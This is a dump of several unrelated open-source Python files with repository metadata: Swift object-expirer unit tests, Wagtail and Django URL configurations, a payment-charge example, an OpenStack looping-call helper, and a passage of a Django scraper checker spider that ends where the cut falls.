"copies": "1",
"ref": "refs/heads/master",
"path": "ydkgen/api_model.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "21945"
},
{
"name": "C",
"bytes": "15875"
},
{
"name": "C++",
"bytes": "3529963"
},
{
"name": "CMake",
"bytes": "120070"
},
{
"name": "CSS",
"bytes": "134"
},
{
"name": "Dockerfile",
"bytes": "770"
},
{
"name": "Go",
"bytes": "566728"
},
{
"name": "Makefile",
"bytes": "960022"
},
{
"name": "Python",
"bytes": "1052712"
},
{
"name": "Ruby",
"bytes": "4023"
},
{
"name": "Shell",
"bytes": "153786"
}
],
"symlink_target": ""
} |
import urllib
from time import time
from unittest import main, TestCase
from test.unit import FakeLogger
from copy import deepcopy
import mock
from swift.common import internal_client
from swift.obj import expirer
def not_random():
return 0.5
last_not_sleep = 0
def not_sleep(seconds):
global last_not_sleep
last_not_sleep = seconds
class TestObjectExpirer(TestCase):
maxDiff = None
def setUp(self):
global not_sleep
self.old_loadapp = internal_client.loadapp
self.old_sleep = internal_client.sleep
internal_client.loadapp = lambda x: None
internal_client.sleep = not_sleep
def teardown(self):
internal_client.sleep = self.old_sleep
internal_client.loadapp = self.loadapp
def test_get_process_values_from_kwargs(self):
x = expirer.ObjectExpirer({})
vals = {
'processes': 5,
'process': 1,
}
self.assertEqual((5, 1), x.get_process_values(vals))
def test_get_process_values_from_config(self):
vals = {
'processes': 5,
'process': 1,
}
x = expirer.ObjectExpirer(vals)
self.assertEqual((5, 1), x.get_process_values({}))
def test_get_process_values_negative_process(self):
vals = {
'processes': 5,
'process': -1,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_get_process_values_negative_processes(self):
vals = {
'processes': -5,
'process': 1,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_get_process_values_process_greater_than_processes(self):
vals = {
'processes': 5,
'process': 7,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_init_concurrency_too_small(self):
conf = {
'concurrency': 0,
}
self.assertRaises(ValueError, expirer.ObjectExpirer, conf)
conf = {
'concurrency': -1,
}
self.assertRaises(ValueError, expirer.ObjectExpirer, conf)
def test_process_based_concurrency(self):
class ObjectExpirer(expirer.ObjectExpirer):
def __init__(self, conf):
super(ObjectExpirer, self).__init__(conf)
self.processes = 3
self.deleted_objects = {}
def delete_object(self, actual_obj, timestamp, container, obj):
if container not in self.deleted_objects:
self.deleted_objects[container] = set()
self.deleted_objects[container].add(obj)
class InternalClient(object):
def __init__(self, containers):
self.containers = containers
def get_account_info(self, *a, **kw):
return len(self.containers.keys()), \
sum([len(self.containers[x]) for x in self.containers])
def iter_containers(self, *a, **kw):
return [{'name': x} for x in self.containers.keys()]
def iter_objects(self, account, container):
return [{'name': x} for x in self.containers[container]]
def delete_container(*a, **kw):
pass
containers = {
0: set('1-one 2-two 3-three'.split()),
1: set('2-two 3-three 4-four'.split()),
2: set('5-five 6-six'.split()),
3: set('7-seven'.split()),
}
x = ObjectExpirer({})
x.swift = InternalClient(containers)
deleted_objects = {}
for i in xrange(0, 3):
x.process = i
x.run_once()
self.assertNotEqual(deleted_objects, x.deleted_objects)
deleted_objects = deepcopy(x.deleted_objects)
self.assertEqual(containers, deleted_objects)
def test_delete_object(self):
class InternalClient(object):
def __init__(self, test, account, container, obj):
self.test = test
self.account = account
self.container = container
self.obj = obj
self.delete_object_called = False
def delete_object(self, account, container, obj):
self.test.assertEqual(self.account, account)
self.test.assertEqual(self.container, container)
self.test.assertEqual(self.obj, obj)
self.delete_object_called = True
class DeleteActualObject(object):
def __init__(self, test, actual_obj, timestamp):
self.test = test
self.actual_obj = actual_obj
self.timestamp = timestamp
self.called = False
def __call__(self, actual_obj, timestamp):
self.test.assertEqual(self.actual_obj, actual_obj)
self.test.assertEqual(self.timestamp, timestamp)
self.called = True
container = 'container'
obj = 'obj'
actual_obj = 'actual_obj'
timestamp = 'timestamp'
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.swift = \
InternalClient(self, x.expiring_objects_account, container, obj)
x.delete_actual_object = \
DeleteActualObject(self, actual_obj, timestamp)
x.delete_object(actual_obj, timestamp, container, obj)
self.assertTrue(x.swift.delete_object_called)
self.assertTrue(x.delete_actual_object.called)
def test_report(self):
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.report()
self.assertEqual(x.logger.log_dict['info'], [])
x.logger._clear()
x.report(final=True)
self.assertTrue('completed' in x.logger.log_dict['info'][-1][0][0],
x.logger.log_dict['info'])
self.assertTrue('so far' not in x.logger.log_dict['info'][-1][0][0],
x.logger.log_dict['info'])
x.logger._clear()
x.report_last_time = time() - x.report_interval
x.report()
self.assertTrue('completed' not in x.logger.log_dict['info'][-1][0][0],
x.logger.log_dict['info'])
self.assertTrue('so far' in x.logger.log_dict['info'][-1][0][0],
x.logger.log_dict['info'])
def test_run_once_nothing_to_do(self):
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.swift = 'throw error because a string does not have needed methods'
x.run_once()
self.assertEqual(x.logger.log_dict['exception'],
[(("Unhandled exception",), {},
"'str' object has no attribute "
"'get_account_info'")])
def test_run_once_calls_report(self):
class InternalClient(object):
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(*a, **kw):
return []
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.swift = InternalClient()
x.run_once()
self.assertEqual(
x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 0 objects expired',), {})])
def test_container_timestamp_break(self):
class InternalClient(object):
def __init__(self, containers):
self.containers = containers
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def iter_objects(*a, **kw):
raise Exception('This should not have been called')
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.swift = InternalClient([{'name': str(int(time() + 86400))}])
x.run_once()
for exccall in x.logger.log_dict['exception']:
self.assertTrue(
'This should not have been called' not in exccall[0][0])
self.assertEqual(
x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 0 objects expired',), {})])
# Reverse test to be sure it still would blow up the way expected.
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.swift = InternalClient([{'name': str(int(time() - 86400))}])
x.run_once()
self.assertEqual(
x.logger.log_dict['exception'],
[(('Unhandled exception',), {},
str(Exception('This should not have been called')))])
def test_object_timestamp_break(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
def should_not_be_called(*a, **kw):
raise Exception('This should not have been called')
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % int(time() + 86400)}])
x.run_once()
for exccall in x.logger.log_dict['exception']:
self.assertTrue(
'This should not have been called' not in exccall[0][0])
self.assertEqual(
x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 0 objects expired',), {})])
# Reverse test to be sure it still would blow up the way expected.
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
ts = int(time() - 86400)
x.swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
x.delete_actual_object = should_not_be_called
x.run_once()
excswhiledeleting = []
for exccall in x.logger.log_dict['exception']:
if exccall[0][0].startswith('Exception while deleting '):
excswhiledeleting.append(exccall[0][0])
self.assertEqual(
excswhiledeleting,
['Exception while deleting object %d %d-actual-obj '
'This should not have been called' % (ts, ts)])
def test_failed_delete_keeps_entry(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def delete_object(*a, **kw):
raise Exception('This should not have been called')
def iter_objects(self, *a, **kw):
return self.objects
def deliberately_blow_up(actual_obj, timestamp):
raise Exception('failed to delete actual object')
def should_not_get_called(container, obj):
raise Exception('This should not have been called')
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.iter_containers = lambda: [str(int(time() - 86400))]
ts = int(time() - 86400)
x.delete_actual_object = deliberately_blow_up
x.swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
x.run_once()
excswhiledeleting = []
for exccall in x.logger.log_dict['exception']:
if exccall[0][0].startswith('Exception while deleting '):
excswhiledeleting.append(exccall[0][0])
self.assertEqual(
excswhiledeleting,
['Exception while deleting object %d %d-actual-obj '
'failed to delete actual object' % (ts, ts)])
self.assertEqual(
x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 0 objects expired',), {})])
# Reverse test to be sure it still would blow up the way expected.
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
ts = int(time() - 86400)
x.delete_actual_object = lambda o, t: None
x.swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
x.run_once()
excswhiledeleting = []
for exccall in x.logger.log_dict['exception']:
if exccall[0][0].startswith('Exception while deleting '):
excswhiledeleting.append(exccall[0][0])
self.assertEqual(
excswhiledeleting,
['Exception while deleting object %d %d-actual-obj This should '
'not have been called' % (ts, ts)])
def test_success_gets_counted(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.delete_actual_object = lambda o, t: None
self.assertEqual(x.report_objects, 0)
x.swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % int(time() - 86400)}])
x.run_once()
self.assertEqual(x.report_objects, 1)
self.assertEqual(
x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 1 objects expired',), {})])
def test_delete_actual_object_does_not_get_unicode(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
got_unicode = [False]
def delete_actual_object_test_for_unicode(actual_obj, timestamp):
if isinstance(actual_obj, unicode):
got_unicode[0] = True
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.delete_actual_object = delete_actual_object_test_for_unicode
self.assertEqual(x.report_objects, 0)
x.swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': u'%d-actual-obj' % int(time() - 86400)}])
x.run_once()
self.assertEqual(x.report_objects, 1)
self.assertEqual(
x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 1 objects expired',), {})])
self.assertFalse(got_unicode[0])
def test_failed_delete_continues_on(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
raise Exception('failed to delete container')
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
def fail_delete_actual_object(actual_obj, timestamp):
raise Exception('failed to delete actual object')
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
cts = int(time() - 86400)
ots = int(time() - 86400)
containers = [
{'name': str(cts)},
{'name': str(cts + 1)},
]
objects = [
{'name': '%d-actual-obj' % ots},
{'name': '%d-next-obj' % ots}
]
x.swift = InternalClient(containers, objects)
x.delete_actual_object = fail_delete_actual_object
x.run_once()
excswhiledeleting = []
for exccall in x.logger.log_dict['exception']:
if exccall[0][0].startswith('Exception while deleting '):
excswhiledeleting.append(exccall[0][0])
self.assertEqual(sorted(excswhiledeleting), sorted([
'Exception while deleting object %d %d-actual-obj failed to '
'delete actual object' % (cts, ots),
'Exception while deleting object %d %d-next-obj failed to '
'delete actual object' % (cts, ots),
'Exception while deleting object %d %d-actual-obj failed to '
'delete actual object' % (cts + 1, ots),
'Exception while deleting object %d %d-next-obj failed to '
'delete actual object' % (cts + 1, ots),
'Exception while deleting container %d failed to delete '
'container' % (cts,),
'Exception while deleting container %d failed to delete '
'container' % (cts + 1,)]))
self.assertEqual(
x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 0 objects expired',), {})])
def test_run_forever_initial_sleep_random(self):
global last_not_sleep
def raise_system_exit():
raise SystemExit('test_run_forever')
interval = 1234
x = expirer.ObjectExpirer({'__file__': 'unit_test',
'interval': interval})
orig_random = expirer.random
orig_sleep = expirer.sleep
try:
expirer.random = not_random
expirer.sleep = not_sleep
x.run_once = raise_system_exit
x.run_forever()
except SystemExit as err:
pass
finally:
expirer.random = orig_random
expirer.sleep = orig_sleep
self.assertEqual(str(err), 'test_run_forever')
self.assertEqual(last_not_sleep, 0.5 * interval)
def test_run_forever_catches_usual_exceptions(self):
raises = [0]
def raise_exceptions():
raises[0] += 1
if raises[0] < 2:
raise Exception('exception %d' % raises[0])
raise SystemExit('exiting exception %d' % raises[0])
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
orig_sleep = expirer.sleep
try:
expirer.sleep = not_sleep
x.run_once = raise_exceptions
x.run_forever()
except SystemExit as err:
pass
finally:
expirer.sleep = orig_sleep
self.assertEqual(str(err), 'exiting exception 2')
self.assertEqual(x.logger.log_dict['exception'],
[(('Unhandled exception',), {},
'exception 1')])
def test_delete_actual_object(self):
got_env = [None]
def fake_app(env, start_response):
got_env[0] = env
start_response('204 No Content', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda x: fake_app
x = expirer.ObjectExpirer({})
ts = '1234'
x.delete_actual_object('/path/to/object', ts)
self.assertEqual(got_env[0]['HTTP_X_IF_DELETE_AT'], ts)
def test_delete_actual_object_nourlquoting(self):
# delete_actual_object should not do its own url quoting because
# internal client's make_request handles that.
got_env = [None]
def fake_app(env, start_response):
got_env[0] = env
start_response('204 No Content', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda x: fake_app
x = expirer.ObjectExpirer({})
ts = '1234'
x.delete_actual_object('/path/to/object name', ts)
self.assertEqual(got_env[0]['HTTP_X_IF_DELETE_AT'], ts)
self.assertEqual(got_env[0]['PATH_INFO'], '/v1/path/to/object name')
def test_delete_actual_object_handles_404(self):
def fake_app(env, start_response):
start_response('404 Not Found', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda x: fake_app
x = expirer.ObjectExpirer({})
x.delete_actual_object('/path/to/object', '1234')
def test_delete_actual_object_handles_412(self):
def fake_app(env, start_response):
start_response('412 Precondition Failed',
[('Content-Length', '0')])
return []
internal_client.loadapp = lambda x: fake_app
x = expirer.ObjectExpirer({})
x.delete_actual_object('/path/to/object', '1234')
def test_delete_actual_object_does_not_handle_odd_stuff(self):
def fake_app(env, start_response):
start_response(
'503 Internal Server Error',
[('Content-Length', '0')])
return []
internal_client.loadapp = lambda x: fake_app
x = expirer.ObjectExpirer({})
exc = None
try:
x.delete_actual_object('/path/to/object', '1234')
except Exception as err:
exc = err
finally:
pass
self.assertEqual(503, exc.resp.status_int)
def test_delete_actual_object_quotes(self):
name = 'this name should get quoted'
timestamp = '1366063156.863045'
x = expirer.ObjectExpirer({})
x.swift.make_request = mock.MagicMock()
x.delete_actual_object(name, timestamp)
x.swift.make_request.assert_called_once()
self.assertEqual(x.swift.make_request.call_args[0][1],
'/v1/' + urllib.quote(name))
if __name__ == '__main__':
main()
| {
"content_hash": "0c9b4d9c8ed9e1371bde23a596e68b65",
"timestamp": "",
"source": "github",
"line_count": 686,
"max_line_length": 79,
"avg_line_length": 34.72886297376093,
"alnum_prop": 0.5393720617864338,
"repo_name": "lielongxingkong/windchimes",
"id": "493de0ff2455e2944f449080b9d3425311670475",
"size": "24414",
"binary": false,
"copies": "3",
"ref": "refs/heads/develop",
"path": "test/unit/obj/test_expirer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "15048"
},
{
"name": "Python",
"bytes": "3535857"
},
{
"name": "Shell",
"bytes": "5547"
}
],
"symlink_target": ""
} |
from django.conf.urls import include, url
from django.conf import settings
from django.contrib import admin
from wagtail.wagtailadmin import urls as wagtailadmin_urls
from wagtail.wagtaildocs import urls as wagtaildocs_urls
from wagtail.wagtailcore import urls as wagtail_urls
urlpatterns = [
url(r'^django-admin/', include(admin.site.urls)),
url(r'^admin/', include(wagtailadmin_urls)),
url(r'^documents/', include(wagtaildocs_urls)),
url(r'^search/$', '{{ cookiecutter.repo_name }}.search.views.search', name='search'),
]
if settings.DEBUG:
from django.conf.urls.static import static
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.views.generic import TemplateView
# Serve static and media files from development server
urlpatterns += staticfiles_urlpatterns()
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# Add views for testing 404 and 500 templates
urlpatterns += [
url(r'^test404/$', TemplateView.as_view(template_name='404.html')),
url(r'^test500/$', TemplateView.as_view(template_name='500.html')),
]
urlpatterns += [
url(r'', include(wagtail_urls)),
]
| {
"content_hash": "e99bb67ef170abe541d1847fbc84aa80",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 89,
"avg_line_length": 31.025641025641026,
"alnum_prop": 0.7206611570247934,
"repo_name": "RocketPod/wagtail-cookiecutter",
"id": "2c5850b2b058ad04f53e509a6f4f8f62d6093719",
"size": "1210",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/urls.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "5120"
},
{
"name": "CSS",
"bytes": "414"
},
{
"name": "HTML",
"bytes": "4530"
},
{
"name": "Makefile",
"bytes": "5612"
},
{
"name": "Python",
"bytes": "25024"
},
{
"name": "Ruby",
"bytes": "1225"
}
],
"symlink_target": ""
} |
"""backend URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from rest_framework import routers
from . import views
router = routers.DefaultRouter()
router.register(r'profiles', views.ProfileViewSet, base_name='profiles')
urlpatterns = [
url(r'^', include(router.urls)),
]
| {
"content_hash": "2c4d23afa08dd19fb872d2d54ae24033",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 79,
"avg_line_length": 34.65384615384615,
"alnum_prop": 0.7114317425083241,
"repo_name": "stphivos/django-angular2-fullstack-devops",
"id": "8b58d4bf4069ce4dfab3bf5882e0904d24439a4a",
"size": "901",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "backend/api/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1959"
},
{
"name": "HCL",
"bytes": "17373"
},
{
"name": "HTML",
"bytes": "3640"
},
{
"name": "JavaScript",
"bytes": "7882"
},
{
"name": "Python",
"bytes": "15835"
},
{
"name": "Shell",
"bytes": "17894"
},
{
"name": "TypeScript",
"bytes": "62594"
}
],
"symlink_target": ""
} |
from gerencianet import Gerencianet
from ...credentials import credentials
gn = Gerencianet(credentials.CREDENTIALS)
body = {
'items': [{
'name': "Product 1",
'value': 1100,
'amount': 2
}],
'shippings': [{
'name': "Default Shipping Cost",
'value': 100
}]
}
response = gn.create_charge(body=body)
print(response)
| {
"content_hash": "f70cac1c786bfb27b4d6160c6b2af2f4",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 41,
"avg_line_length": 18.65,
"alnum_prop": 0.5871313672922251,
"repo_name": "gerencianet/gn-api-sdk-python",
"id": "53b40aed4d829a9a24224d0b5f3e430655b90f44",
"size": "392",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/default/charge/create_charge.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "25401"
}
],
"symlink_target": ""
} |
import sys
from eventlet import event
from eventlet import greenthread
from dragon.openstack.common.gettextutils import _ # noqa
from dragon.openstack.common import log as logging
from dragon.openstack.common import timeutils
LOG = logging.getLogger(__name__)
class LoopingCallDone(Exception):
"""Exception to break out and stop a LoopingCall.
The poll-function passed to LoopingCall can raise this exception to
break out of the loop normally. This is somewhat analogous to
StopIteration.
An optional return-value can be included as the argument to the exception;
this return-value will be returned by LoopingCall.wait()
"""
def __init__(self, retvalue=True):
""":param retvalue: Value that LoopingCall.wait() should return."""
self.retvalue = retvalue
class LoopingCallBase(object):
def __init__(self, f=None, *args, **kw):
self.args = args
self.kw = kw
self.f = f
self._running = False
self.done = None
def stop(self):
self._running = False
def wait(self):
return self.done.wait()
class FixedIntervalLoopingCall(LoopingCallBase):
"""A fixed interval looping call."""
def start(self, interval, initial_delay=None):
self._running = True
done = event.Event()
def _inner():
if initial_delay:
greenthread.sleep(initial_delay)
try:
while self._running:
start = timeutils.utcnow()
self.f(*self.args, **self.kw)
end = timeutils.utcnow()
if not self._running:
break
delay = interval - timeutils.delta_seconds(start, end)
if delay <= 0:
LOG.warn(_('task run outlasted interval by %s sec') %
-delay)
greenthread.sleep(delay if delay > 0 else 0)
except LoopingCallDone as e:
self.stop()
done.send(e.retvalue)
except Exception:
LOG.exception(_('in fixed duration looping call'))
done.send_exception(*sys.exc_info())
return
else:
done.send(True)
self.done = done
greenthread.spawn_n(_inner)
return self.done
# TODO(mikal): this class name is deprecated in Havana and should be removed
# in the I release
LoopingCall = FixedIntervalLoopingCall
class DynamicLoopingCall(LoopingCallBase):
"""A looping call which sleeps until the next known event.
The function called should return how long to sleep for before being
called again.
"""
def start(self, initial_delay=None, periodic_interval_max=None):
self._running = True
done = event.Event()
def _inner():
if initial_delay:
greenthread.sleep(initial_delay)
try:
while self._running:
idle = self.f(*self.args, **self.kw)
if not self._running:
break
if periodic_interval_max is not None:
idle = min(idle, periodic_interval_max)
LOG.debug(_('Dynamic looping call sleeping for %.02f '
'seconds'), idle)
greenthread.sleep(idle)
except LoopingCallDone as e:
self.stop()
done.send(e.retvalue)
except Exception:
LOG.exception(_('in dynamic looping call'))
done.send_exception(*sys.exc_info())
return
else:
done.send(True)
self.done = done
greenthread.spawn(_inner)
return self.done
| {
"content_hash": "42fe69d369b83ec709abdc23d877f8da",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 78,
"avg_line_length": 30.140625,
"alnum_prop": 0.5544323483670296,
"repo_name": "os-cloud-storage/openstack-workload-disaster-recovery",
"id": "9c51513246b8179fb4332d3a8676103328ce93cb",
"size": "4673",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dragon/openstack/common/loopingcall.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "4930"
},
{
"name": "Python",
"bytes": "758400"
},
{
"name": "Shell",
"bytes": "24692"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from builtins import str
import datetime, json, logging, os
from jsonpath_rw import jsonpath, parse
from jsonpath_rw.lexer import JsonPathLexerError
from scrapy import signals
from scrapy.exceptions import CloseSpider
from scrapy.http import Request
from pydispatch import dispatcher
from dynamic_scraper.spiders.django_base_spider import DjangoBaseSpider
from dynamic_scraper.models import ScraperElem
from dynamic_scraper.utils.scheduler import Scheduler
class DjangoChecker(DjangoBaseSpider):
name = "django_checker"
mandatory_vars = ['ref_object', 'scraper',]
def __init__(self, *args, **kwargs):
super(DjangoChecker, self).__init__(self, *args, **kwargs)
@classmethod
def from_crawler(cls, crawler, *args, **kwargs):
spider = cls(*args, **kwargs)
spider._set_crawler(crawler)
spider._set_config(**kwargs)
spider._check_checker_config()
spider._set_request_kwargs()
spider._set_meta_splash_args()
spider.scheduler = Scheduler(spider.scraper.scraped_obj_class.checker_scheduler_conf)
dispatcher.connect(spider.response_received, signal=signals.response_received)
msg = "Checker for " + spider.ref_object.__class__.__name__ + " \"" + str(spider.ref_object) + "\" (" + str(spider.ref_object.pk) + ") initialized."
spider.log(msg, logging.INFO)
return spider
def output_usage_help(self):
out = (
'',
'DDS Usage',
'=========',
' scrapy crawl [scrapy_options] CHECKERNAME -a id=REF_OBJECT_ID [dds_options]',
'',
'Options',
'-------',
'-a do_action=(yes|no) Delete on checker success, default: no (Test Mode)',
'-L LOG_LEVEL (scrapy option) Setting the log level for both Scrapy and DDS',
'-a run_type=(TASK|SHELL) Simulate task based checker run, default: SHELL',
'-a output_response_body=(yes|no) Output response body content for debugging',
'',
)
for out_str in out:
self.dds_logger.info(out_str)
def _set_config(self, **kwargs):
log_msg = ""
#output_response_body
if 'output_response_body' in kwargs and kwargs['output_response_body'] == 'yes':
self.conf['OUTPUT_RESPONSE_BODY'] = True
if len(log_msg) > 0:
log_msg += ", "
log_msg += "output_response_body " + str(self.conf['OUTPUT_RESPONSE_BODY'])
else:
self.conf['OUTPUT_RESPONSE_BODY'] = False
super(DjangoChecker, self)._set_config(log_msg, **kwargs)
def _check_checker_config(self):
if self.scraper.checker_set.count() == 0:
msg = '{cs}No checkers defined for scraper.{ce}'.format(
cs=self.bcolors["INFO"], ce=self.bcolors["ENDC"])
self.dds_logger.warning(msg)
self.output_usage_help()
raise CloseSpider(msg)
def _del_ref_object(self):
if self.action_successful:
self.log("Item already deleted, skipping.", logging.INFO)
return
from scrapy.utils.project import get_project_settings
settings = get_project_settings()
try:
img_elem = self.scraper.get_image_elem()
if hasattr(self.ref_object, img_elem.scraped_obj_attr.name):
img_name = getattr(self.ref_object, img_elem.scraped_obj_attr.name)
thumb_paths = []
if settings.get('IMAGES_THUMBS') and len(settings.get('IMAGES_THUMBS')) > 0:
for key in settings.get('IMAGES_THUMBS').keys():
thumb_paths.append(('thumbnail, {k}'.format(k=key), os.path.join(settings.get('IMAGES_STORE'), 'thumbs', key, img_name),))
del_paths = []
if self.conf['IMAGES_STORE_FORMAT'] == 'FLAT':
del_paths.append(('original, flat path', os.path.join(settings.get('IMAGES_STORE'), img_name),))
if self.conf['IMAGES_STORE_FORMAT'] == 'ALL':
del_paths.append(('original, full/ path', os.path.join(settings.get('IMAGES_STORE'), 'full' , img_name),))
del_paths += thumb_paths
if self.conf['IMAGES_STORE_FORMAT'] == 'THUMBS':
del_paths += thumb_paths
for path in del_paths:
if os.access(path[1], os.F_OK):
try:
os.unlink(path[1])
self.log("Associated image ({n}, {p}) deleted.".format(n=img_name, p=path[0]), logging.INFO)
except Exception:
self.log("Associated image ({n}, {p}) could not be deleted!".format(n=img_name, p=path[0]), logging.ERROR)
else:
self.log("Associated image ({n}, {p}) could not be found!".format(n=img_name, p=path[0]), logging.WARNING)
except ScraperElem.DoesNotExist:
pass
self.ref_object.delete()
self.scraper.last_checker_delete = datetime.datetime.now()
self.scraper.save()
self.action_successful = True
self.log("{cs}Item deleted.{ce}".format(
cs=self.bcolors["ERROR"], ce=self.bcolors["ENDC"]), logging.INFO)
def start_requests(self):
for checker in self.scraper.checker_set.all():
url = getattr(self.ref_object, checker.scraped_obj_attr.name)
rpt = self.scraper.get_rpt_for_scraped_obj_attr(checker.scraped_obj_attr)
kwargs = self.dp_request_kwargs[rpt.page_type].copy()
if 'meta' not in kwargs:
kwargs['meta'] = {}
kwargs['meta']['checker'] = checker
kwargs['meta']['rpt'] = rpt
self._set_meta_splash_args()
if url:
if rpt.request_type == 'R':
yield Request(url, callback=self.parse, method=rpt.method, dont_filter=True, **kwargs)
else:
yield FormRequest(url, callback=self.parse, method=rpt.method, formdata=self.dp_form_data[rpt.page_type], dont_filter=True, **kwargs)
def response_received(self, **kwargs):
checker = kwargs['response'].request.meta['checker']
rpt = kwargs['response'].request.meta['rpt']
# 404 test
if kwargs['response'].status == 404:
if self.scheduler_runtime.num_zero_actions == 0:
self.log("{cs}Checker test returned second 404 ({c}). Delete reason.{ce}".format(
c=str(checker), cs=self.bcolors["ERROR"], ce=self.bcolors["ENDC"]), logging.INFO)
if self.conf['DO_ACTION']:
self._del_ref_object()
else:
self.log("{cs}Checker test returned first 404 ({c}).{ce}".format(
str(checker), cs=self.bcolors["ERROR"], ce=self.bcolors["ENDC"]), logging.INFO)
self.action_successful = True
def parse(self, response):
# x_path test
checker = response.request.meta['checker']
rpt = response.request.meta['rpt']
if self.conf['OUTPUT_RESPONSE_BODY']:
self.log("Response body ({url})\n\n***** RP_START *****\n{resp_body}\n***** RP_END *****\n\n".format(
url=response.url,
resp_body=response.body.decode('utf-8')), logging.INFO)
if checker.checker_type == '4':
self.log("{cs}No 404 result ({c} checker type).{ce}".format(
